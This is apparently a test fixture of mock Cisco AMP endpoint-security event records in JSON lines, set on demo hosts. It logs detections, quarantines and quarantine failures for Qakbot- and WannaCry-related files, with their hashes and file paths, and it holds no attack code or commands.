+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
